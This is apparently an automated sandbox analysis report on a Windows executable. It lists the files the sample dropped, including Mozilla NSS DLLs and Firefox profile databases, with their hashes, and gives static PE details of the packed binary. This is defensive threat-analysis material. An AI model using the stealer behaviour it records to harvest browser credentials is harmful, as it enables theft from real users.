SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\KKKJEBAAECBGDHIECAKJKKECFH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKKKEHJKFCFCBFHIIDGD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: nJohIBtNm5.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 66fb252fe232b_Patksl.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: nJohIBtNm5.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 66fb252fe232b_Patksl.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.949419101901468
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'805'312 bytes
MD5:	48d1da4a5abcc06e5b66eceb3358798b
SHA1:	ef7f178c14b591875355ef9b0d4b0cb70f4160ac
SHA256:	bbbf8e47190ac2362630096db0b05371e693bf298be7a8ec2a18179595521fec
SHA512:	f2ab6369c3e01ce332a85a967d6aa7a04f9fa03786e7c93db403bd38f1a893c4e4fccdb1094657219e9650ec4bc7d64ec0794f872d198f85c61fc1e07fd6a02b
SSDEEP:	24576:8b4CErELvMBwEwWTt3ylNFzfYg72jaZxLDDf++iJH6/WctKaD5EKWqdCMUNAqCNz:7XGvLtl3pCj4xLDDf6s/WkFJ/g5
TLSH:	C985339ECFBB69BEC1C9453097BF0507A666071730E90E671719E3265B2BB2D30E588C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xa86000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F2EE8D3645Ah
punpckhdq mm3, qword ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax+00000000h], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	5ec6a408547e8696b7df60ad0a8a80cc	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x294000	0x200	d20f362d2f1a89c902706d0e58699241	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dqalzxzu	0x4f2000	0x193000	0x192a00	1445e01a701aef33caccaa431a8b4505	False	0.9952436161130084	MIPSEL ECOFF executable not stripped - version -47.23	7.954285698713466	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wjtejwab	0x685000	0x1000	0x400	9df511a7e45948868430ed7df87d07cd	False	0.6982421875	data	5.564222833801639	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x686000	0x3000	0x2200	77cbbd372c53c9c951e73083059dc6e5	False	0.10225183823529412	DOS executable (COM)	1.2089274149945917	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

